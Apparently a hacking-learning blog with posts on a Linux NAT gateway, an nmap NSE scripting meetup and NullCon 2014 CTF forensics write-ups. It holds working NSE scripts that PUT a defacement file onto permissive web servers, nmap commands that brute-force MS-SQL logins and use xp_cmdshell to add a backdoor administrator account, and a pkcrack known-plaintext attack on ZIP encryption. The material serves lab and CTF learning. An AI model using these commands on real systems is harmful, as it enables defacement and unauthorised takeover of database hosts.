Start to learn hacking !

Friday, March 28, 2014

VMware Player guest as Internet gateway

Recently a friend asked me how to set up an Internet gateway on a virtual guest and configure the other virtual machines, and the host, to reach the Internet through it.

The following steps were used to test this successfully.

Details of the setup

All systems involved run Linux.

ppp0 -> Internet connection through a USB dongle (on the gateway guest).
eth0 -> the interface VMware Player attaches to the guest by default.

IP Details
ppp0 -> DHCP by ISP.
eth0 -> 192.168.2.140/24


The following lines can be saved in /etc/rc.local so they are applied at every boot:

# let the kernel forward packets between interfaces
echo 1 > /proc/sys/net/ipv4/ip_forward
# forward anything arriving from the guest/host network
iptables -A FORWARD -i eth0 -j ACCEPT
# rewrite the source address of packets leaving via ppp0 to ppp0's (dynamic) address
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE

All done: this machine is now a Linux router. Two caveats for anything beyond a lab: the FORWARD rule above accepts every packet that enters on eth0 without checking its source address, so match the 192.168.2.0/24 subnet with -s if other networks can reach that interface; and if the FORWARD chain's default policy is DROP rather than ACCEPT, the replies coming back in on ppp0 also need a rule matching -m conntrack --ctstate RELATED,ESTABLISHED.

Setup for the other virtual guests.
Command line (the address must be unique per guest; the gateway is 192.168.2.140):
ifconfig eth0 192.168.2.130/24
route add default gw 192.168.2.140
The guests also need a nameserver in /etc/resolv.conf, exactly as for the host below.

GUI: the same address and gateway entered in the desktop network manager (screenshot not reproduced).


On the HOST system

Add the route:
sudo route add default gw 192.168.2.140 vmnet8
Add a DNS server to /etc/resolv.conf:
nameserver 8.8.8.8

The host's VMware interface (vmnet0) already has an IP address in this subnet; the route above is added through vmnet8, so use whichever vmnet interface actually carries the 192.168.2.0/24 address on your host (check with ifconfig).

After setting up the route, the gateway guest may lose its IP address. Simply set it again with:
ifconfig eth0 192.168.2.140/24








Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This is about the NULL Humla on NMAP NSE scripting given by Sudhir Babu & Rupam Bhattacharya at the Bangalore Center for Internet and Society.

Agenda:

1. Getting familiar with the usage of nmap scripting
2. Look inside a script's source and understand the fundamental structure
3. Write your own script and execute it with nmap against a target machine
4. Get a shell on the target using default scripts against a vulnerable system

Pre-requisites: two systems
  1. Any system running the latest version of nmap
  2. A vulnerable target system (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org

Location of script files on a Linux system: the .nse files and the script.db index live in nmap's scripts directory, typically /usr/share/nmap/scripts/ (nmap --script-help <name> shows a script's documentation without needing the path).




How to run scripts

#nmap -p80 -Pn -n 192.168.2.128 --script=http-date

This scans port 80 and, if it is open, runs the script. The script's own description field reads:

"Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following is nmap's own daytime.nse, which retrieves the date and time from the Daytime service (port 13); it shows the fields every script has:

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}


portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        if status then
                return result
        end
end

Full details of the script format are at http://nmap.org/book/nse-script-format.html

The following script lists the HTTP methods enabled on a web server by sending an OPTIONS request and returning the Allow header:

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

description = [[
Retrieves the methods enabled on an HTTP server via an OPTIONS request.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
  -- send "OPTIONS / HTTP/1.1" and get the parsed response table back
  local response = http.generic_request(host, port, "OPTIONS", "/")
  if not response or not response.status then
    return nil
  end
  -- the server lists the methods it accepts in the Allow header
  local out = stdnse.output_table()
  out["status"] = response["status-line"]
  out["allow"] = response.header["allow"] or "(no Allow header in response)"
  return out
end

The description, author and licence fields are optional for personal use.

This opens a connection to the web server's port, sends OPTIONS and returns the response to the NMAP engine, which displays the result as shown below: the script name followed by its output. Here the server allows GET, HEAD, POST and OPTIONS.

Another example against a web server that also allows dangerous methods such as DELETE, PUT, MOVE, etc.



How to put a file on the web server using an NSE script.

Method one, using http.put:

local http = require "http"
local shortport = require "shortport"
local string = require "string"

description = [[
Uploads a file to a web server that allows the PUT method.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
  -- http.put(host, port, path, options, body)
  local response = http.put(host, port, "/deface.txt", nil, "defacingweb")
  if not response then
    return nil
  end
  -- 201 Created or 204 No Content means the server accepted the upload
  return string.format("PUT /deface.txt -> %s", response["status-line"] or "no response")
end


To DELETE an uploaded file:

local http = require "http"
local shortport = require "shortport"
local string = require "string"

description = [[
Deletes a file from a web server that allows the DELETE method.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
  local response = http.generic_request(host, port, "DELETE", "/deface.txt", nil)
  if not response then
    return nil
  end
  return string.format("DELETE /deface.txt -> %s", response["status-line"] or "no response")
end

SOCKET

Create a file using an NSE socket (hand-built request, no http library):

local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"

categories = {"default"}

portrule = shortport.http

action = function(host, port)
  local body = "deface"
  -- Host and Content-Length are derived from the target and the body rather
  -- than typed in, so the request stays valid for any target and any payload
  local request = string.format(
    "PUT /deface.txt HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\nConnection: close\r\n\r\n%s",
    host.targetname or host.ip, #body, body)

  local socket = nmap.new_socket()
  socket:set_timeout(5000)
  local status, err = socket:connect(host, port)
  if not status then
    return "connect failed: " .. tostring(err)
  end
  socket:send(request)
  -- receive() returns (status, data); keep the data, not just the boolean
  local ok, response = socket:receive()
  socket:close()
  if ok then
    return response
  end
end
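The whole Humla workflow above (OPTIONS, then PUT, then DELETE), as an added example in Python rather than Lua so it can be run outside nmap; it is not code from the session or from the nmap project. It parses the Allow header instead of dumping the raw response, flags the methods worth reporting, builds the raw PUT request with a Content-Length computed from the body (the usual slip in hand-built requests), and proves a PUT really worked by reading the file back before deleting it. The loopback demo server, the marker path /nse-probe.txt and the marker body are constructed assumptions, not anything from the page.

```python
"""OPTIONS -> PUT -> GET -> DELETE probe against an HTTP server.

Added example, not from the NULL Humla session or from nmap. The demo
server, the marker path /nse-probe.txt and the marker body are assumptions.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Methods that modify content or echo request data back to the client.
DANGEROUS = {"PUT", "DELETE", "MOVE", "COPY", "PATCH", "TRACE", "MKCOL", "PROPPATCH"}


def split_methods(value: str) -> set:
    """'GET, HEAD, post' -> {'GET', 'HEAD', 'POST'}"""
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def parse_allow(raw_response: bytes) -> set:
    """Return the methods listed in the Allow header of a raw HTTP response."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    for line in head.split("\r\n")[1:]:           # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "allow":
            return split_methods(value)
    return set()


def dangerous_methods(methods: set) -> set:
    """Subset of the advertised methods worth reporting as a finding."""
    return set(methods) & DANGEROUS


def build_put_request(host: str, path: str, body: bytes) -> bytes:
    """Raw PUT with Host and Content-Length derived from the inputs."""
    head = (f"PUT {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode("ascii") + body


def probe(host: str, port: int, marker_path: str = "/nse-probe.txt") -> dict:
    """OPTIONS the server; if PUT is allowed, upload, read back and delete a marker."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", "/")
    resp = conn.getresponse()
    resp.read()
    allow = split_methods(resp.getheader("Allow") or "")
    result = {"allow": allow, "dangerous": dangerous_methods(allow), "put_verified": False}
    if "PUT" in allow:
        body = b"nse-probe"                        # constructed marker content
        conn.request("PUT", marker_path, body=body)
        put = conn.getresponse()
        put.read()
        conn.request("GET", marker_path)
        got = conn.getresponse()
        result["put_verified"] = put.status in (200, 201, 204) and got.read() == body
        conn.request("DELETE", marker_path)       # clean up the marker again
        conn.getresponse().read()
    conn.close()
    return result


class DemoHandler(BaseHTTPRequestHandler):
    """Constructed target that (unwisely) enables PUT and DELETE."""
    store = {}

    def log_message(self, *args):                 # keep the demo quiet
        pass

    def _reply(self, code, body=b"", allow=None):
        self.send_response(code)
        if allow:
            self.send_header("Allow", allow)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, allow="GET, HEAD, POST, OPTIONS, PUT, DELETE")

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)

    def do_DELETE(self):
        self._reply(204 if self.store.pop(self.path, None) is not None else 404)


def run_demo() -> dict:
    """Start the demo server on a free loopback port and probe it."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against a real target, call probe() with the host and port; the PUT/GET/DELETE round trip only happens when the server advertises PUT, and the marker is removed afterwards so the check leaves nothing behind.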


Other default NSE script examples

SQL username/password brute-forcing:
 #nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt,passdb=password.txt 192.168.0.5

SQL command shell, add a user (the account must be allowed to run xp_cmdshell; the sysadmin account sa is used here):
 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to the Administrators group (net localgroup administrators <username> /add):

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run other commands, for example "ipconfig":
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to NULL++ Sudhir Babu ++ Rupam Bhattacharya & Riyaz Walikar ++ Akash Mahajan


Monday, January 27, 2014

NULLCON2014-CTF-Misc-Levels

Misc Level 1


A pcap file is given and we need to find a store name!

I loaded the pcap in Wireshark and listed the objects carried in the traffic with the HTTP object viewer (File > Export Objects > HTTP).
It showed an image named nullCTF.png.
I saved that image and started reading about metadata and EXIF:
http://en.wikipedia.org/wiki/Exchangeable_image_file_format
A Google search for EXIF data extraction turned up a good site for it.

The EXIF data contained the following information (screenshot not reproduced):

So this shows exactly the information we were expecting!
I clicked the Google Maps link.

After enlarging the map, marker "A" is right next to a bank :)
So it is near a bank. That is the flag.

Misc Level 2
In Level 2 an SWF file is provided and we are supposed to find an email address!
I tried to convert the SWF to XML using SWFMILL.EXE.
It threw a parsing error!
What next? A string in the file looked like letters converted to percent-encoded hex:
%68%74%74%70%3a%2f%2f%62%69%74%2e%6c%79%2f%31%61%4c%49%59%76%57
Hex values:
68 74 74 70 3a 2f 2f 62 69 74 2e 6c 79 2f 31 61 4c 49 59 76 57

Converted with an online converter -> http://www.branah.com/ascii-converter
Decoded as ASCII this reads http://bit.ly/1aLIYvW: instead of an email address we got a shortened URL!
It led to another file to download, an APK!
I extracted the APK and grepped the classes, and out came an email address :)


Misc Level 3
Let's listen to music..

An mp3 file was downloaded. With last year's experience I used the Audacity audio editor
and played the file, forwards and reversed :)
Nothing came up.
Then I checked the left and right channels separately!
One of them carried something that sounded like Morse code :)

I listened, wrote down the Morse code and converted it to the corresponding letters.
That is the FLAG :)
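Turning the timed tone bursts heard in one channel into letters, as an added example that is not part of the write-up: the input is a constructed list of tone/silence durations of the kind one would read off the Audacity waveform, and the decoder classifies each by its length relative to the shortest tone rather than by a fixed speed, so moderately uneven keying still decodes. The encoder exists only to build sample input.

```python
"""Timing-based Morse decoder for tone/silence segments read off an audio track.

Added example, not part of the write-up. Input is a constructed list of
(is_tone, duration_ms) pairs such as one would measure from the envelope of
the Morse channel in Audacity.
"""
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z", "-----": "0", ".----": "1", "..---": "2",
    "...--": "3", "....-": "4", ".....": "5", "-....": "6", "--...": "7",
    "---..": "8", "----.": "9",
}
TO_MORSE = {v: k for k, v in MORSE.items()}


def decode_timings(segments) -> str:
    """Decode (is_tone, duration) segments using standard 1/3/7 unit timing.

    The unit is taken from the shortest tone (a dit), so the decoder adapts
    to whatever speed the challenge author keyed at.
    """
    tones = [d for on, d in segments if on]
    if not tones:
        return ""
    unit = min(tones)
    words, letter = [], ""
    for on, d in segments:
        units = d / unit
        if on:
            letter += "." if units < 2 else "-"      # dit ~1 unit, dah ~3
        elif units >= 5:                            # word gap ~7 units
            words.append(MORSE.get(letter, "?") + " ")
            letter = ""
        elif units >= 2:                            # letter gap ~3 units
            words.append(MORSE.get(letter, "?"))
            letter = ""
        # an intra-letter gap (~1 unit) just separates elements
    if letter:
        words.append(MORSE.get(letter, "?"))
    return "".join(words).strip()


def encode_timings(text: str, unit_ms: int = 60) -> list:
    """Build ideal segments for text; used only to construct sample input."""
    segments = []
    for w, word in enumerate(text.upper().split()):
        if w:
            segments.append((False, 7 * unit_ms))
        for i, ch in enumerate(word):
            if i:
                segments.append((False, 3 * unit_ms))
            for j, element in enumerate(TO_MORSE[ch]):
                if j:
                    segments.append((False, unit_ms))
                segments.append((True, unit_ms if element == "." else 3 * unit_ms))
    return segments


if __name__ == "__main__":
    print(decode_timings(encode_timings("flag is here")))
```

The thresholds (2 and 5 units) sit between the nominal 1/3 and 3/7 unit lengths, which is what lets a hand-keyed signal with 20-30% jitter still come out right; a real run would feed it the on/off durations measured from the envelope of the channel that carries the tones.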

NULLCON2014-CTF


This is just to summarise my experience with the NullCon CTF 2014 (http://ctf.nullcon.net).

Cracking the CTF requires knowledge at multiple levels.

The following screenshot shows all the main categories, like Trivia, Web, RE, Crypto, etc.;
under each of them there are 3-6 challenges.

With help from Google and several friends in the null community I was able to score 3900 points and ranked 23rd.

The main focus of this write-up is the Forensics challenges.

We were instructed to download a 2 GB file from http://sourceforge.net/projects/nullconctf2014/?source=directory

Extracting the 2 GB RAR file gave a 10 GB dd image of a hard disk.
To use it with VMware Player I used dd2vmdk (http://sourceforge.net/projects/dd2vmdk/), which creates a VMDK descriptor so that VMware can use the raw dd image as a virtual disk (the image itself is not modified).

I first examined the dd image on another Linux system to identify the operating system, which turned out to be Windows 7.
The command executed was:
dd2vmdk -i syn_null2014ctf.dd.001 -v win7.vmdk

After this, create a Windows 7 guest in VMware Player with win7.vmdk as its hard disk. While adding the disk it may ask whether to keep the current format or convert; I chose to keep the existing format.

The VMware Windows 7 guest booted nicely without asking for a password.

Now we have the system up and running to work on the challenges.

Forensics Level 1

The client complained that whenever he boots up the machine, all files in his Documents folder are automatically deleted. Can you identify the culprit executable process doing this?

To answer this we need to know how programs get executed automatically and persistently on Windows. I referred to many web sites; the following were good:
http://www.slideshare.net/boonlia/registry-forensics-10249175
http://www.bleepingcomputer.com/tutorials/windows-program-automatic-startup-locations/

After looking into all the locations I found only one autorun entry, and that is
audiodg.exe
which looks like an innocent, genuine Windows file!

There were no suspicious registry entries in the common locations, but as per the first presentation there are some other important locations to look at (list from the slides not reproduced here).

One of them is "Image File Execution Options" (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options): a per-executable Debugger value there makes Windows launch the named program, with the original executable's path as its argument, whenever that executable is started. Searching under it:

Here we can see a suspicious entry for "ntbackup.exe".

Forensics Level 2

There is a ZIP file named "null password.zip" on the desktop.
The task is to get the password.
Even without the password we can list the file names, like the following:
I started searching for these files on the system: if they had been present before being added to the ZIP, it would be easy to open password.docx and get the flag. Unfortunately that file was not there, but I did find the PDF file.

After searching on Google for some time I came across a ZIP attack type called the known plaintext attack (KPA), which works against the traditional PKZIP encryption (ZipCrypto) and is implemented by pkcrack.
I found a wonderful explanation with practical steps on the following web site:

So the steps for this level are as follows. Make sure only the ZIP file is in the folder, and run the commands from a terminal; extract, pkcrack and zipdecrypt all ship with the pkcrack package.
1. extract "null password.zip" "Null final1.pdf"
   (this pulls the still-encrypted, still-compressed entry out of the archive without decompressing it)
2. Rename the extracted file (no need to open it) to Null final1C.pdf
3. ZIP the Null final1.pdf found on the system, as plaintext, with the same rar utility available on the Windows 7 machine, creating a ZIP without encryption (any name is fine; say open.zip). Using the same archiver matters: the attack needs the compressed bytes of the plaintext to match those inside the encrypted archive.
4. Run extract again on the unencrypted ZIP:
   extract open.zip "Null final1.pdf"
5. Rename this file as well: rename "Null final1.pdf" "Null final1P.pdf"
6. Verify: if you used the entire file as plaintext and everything went according to plan, the extracted encrypted file (Null final1C.pdf) should be exactly 12 bytes longer than the extracted plaintext file (Null final1P.pdf); the difference is ZipCrypto's 12-byte encryption header.
7. pkcrack -c "Null final1C.pdf" -p "Null final1P.pdf"
   (I used the Windows build, which is 16/32-bit only; pkcrack is plain C and also compiles on Linux)
8. On success pkcrack prints the three internal keys Key0, Key1 and Key2; those are the output we are interested in.
9. Use the keys to decrypt the files in the ZIP with the zipdecrypt utility:
   zipdecrypt <key0> <key1> <key2> "null password.zip" openzip.zip
10. Now we have openzip.zip. Just unzip password.docx and get the flag.
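The cipher the steps above attack, as an added example that is not part of the write-up and not code from pkcrack or zipdecrypt. It implements the traditional PKZIP stream cipher (ZipCrypto) from PKWARE's APPNOTE and makes two things from the procedure concrete: the 12-byte encryption header that makes the extracted encrypted entry exactly 12 bytes longer than the plaintext one, and the fact that the cipher's whole state is three 32-bit words, so whoever holds those words (pkcrack's Key0..Key2, consumed by zipdecrypt) can decrypt without ever learning the password. The password, the sample entry content and the assumption that the recovered keys are the password-derived state (the same for every entry in the archive) are this example's own.

```python
"""Traditional PKZIP stream cipher (ZipCrypto), as used by "null password.zip".

Added example, not part of the original write-up and not code from pkcrack
or zipdecrypt. Implements the cipher from PKWARE's APPNOTE; the password and
the sample entry content are constructed for the demo.
"""
import os
import zlib

# Standard CRC-32 table (polynomial 0xEDB88320), the same CRC the ZIP format uses.
_CRCTAB = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRCTAB.append(_c)


def _crc32_byte(crc: int, b: int) -> int:
    return _CRCTAB[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """Cipher state is three 32-bit words (key0, key1, key2)."""

    def __init__(self, password: bytes = b"", keys=None):
        self.k0, self.k1, self.k2 = keys or (0x12345678, 0x23456789, 0x34567890)
        for b in password:            # the password only sets the initial state
            self.update(b)

    def update(self, p: int) -> None:
        """Feed one plaintext byte into the state (APPNOTE 'update_keys')."""
        self.k0 = _crc32_byte(self.k0, p)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_byte(self.k2, self.k1 >> 24)

    def stream_byte(self) -> int:
        """Keystream byte derived from key2 only (APPNOTE 'decrypt_byte')."""
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self.stream_byte())
            self.update(p)
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self.stream_byte()
            self.update(p)            # the state advances on plaintext bytes, which
            out.append(p)             # is why known plaintext pins down the keystream
        return bytes(out)

    def keys(self):
        return (self.k0, self.k1, self.k2)


def zip_encrypt(plain: bytes, password: bytes) -> bytes:
    """What a ZIP stores for a stored (uncompressed) entry: 12-byte header + data."""
    # 11 random bytes plus the high byte of the CRC, used as a cheap password check
    header = os.urandom(11) + bytes([zlib.crc32(plain) >> 24])
    return ZipCrypto(password).encrypt(header + plain)


def zip_decrypt(enc: bytes, password: bytes) -> bytes:
    """Decrypt with the password, rejecting obviously wrong passwords like unzip does."""
    z = ZipCrypto(password)
    header = z.decrypt(enc[:12])
    body = z.decrypt(enc[12:])
    if header[11] != zlib.crc32(body) >> 24:
        raise ValueError("wrong password")
    return body


def keys_from_password(password: bytes):
    """Password-derived state; assumed here to be the three words pkcrack prints."""
    return ZipCrypto(password).keys()


def decrypt_with_keys(enc: bytes, keys) -> bytes:
    """What zipdecrypt does: start from the recovered keys, no password needed."""
    return ZipCrypto(keys=keys).decrypt(enc)[12:]


if __name__ == "__main__":
    plain = b"%PDF-1.4 constructed sample entry\n" * 4   # stand-in for Null final1.pdf
    enc = zip_encrypt(plain, b"s3cret")
    print("encrypted entry is", len(enc) - len(plain), "bytes longer than the plaintext")
    print("decrypted from keys alone:", decrypt_with_keys(enc, keys_from_password(b"s3cret")) == plain)
```

Two things to take from it: the only unknown per byte is a keystream value that depends on the three words and the plaintext already seen, which is what makes a few hundred bytes of matching compressed plaintext enough for pkcrack; and because every entry in an archive starts from the same password-derived words, recovering them from one entry (the PDF) decrypts the others (password.docx) too.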


Forensics Level 3
There is a pcapng file on the desktop, about 35 MB in size.
This one is about GPS / geolocation.
Not much to write about this: I used Wireshark compiled with the GeoIP plugin, which shows the locations on a map. Amazing. The flag is a road name, not a country name like China.

Forensics Level 4
There is an image named nullcon.jpg on the desktop.
stegdetect says the file carries Invisible Secrets data, but a password is needed.
There was a password hint: "remove i ..".
stegdetect -t i Nullcon.jpg
Nullcon.jpg : invisible[64](***)
(-t i restricts stegdetect to its Invisible Secrets test.)

After taking some help I opened the file in GIMP and used the Channels dialog: showing only the red channel revealed an image that looked like the Eiffel Tower. So if we remove the i from Eiffel, that is probably the password for opening the invisible text file embedded with the flag!
The file looks like the following by default (screenshot not reproduced):
After playing with the channels the image looks like the following:
We can see the Eiffel Tower in the image; viewed from a particular angle it is clearly the Eiffel Tower :)

So we have a JPEG file with Invisible Secrets data and a password to open it. Next, the search for a tool... the trial version of East-Tec Invisible Secrets (http://www.east-tec.com/invisiblesecrets/reviews/)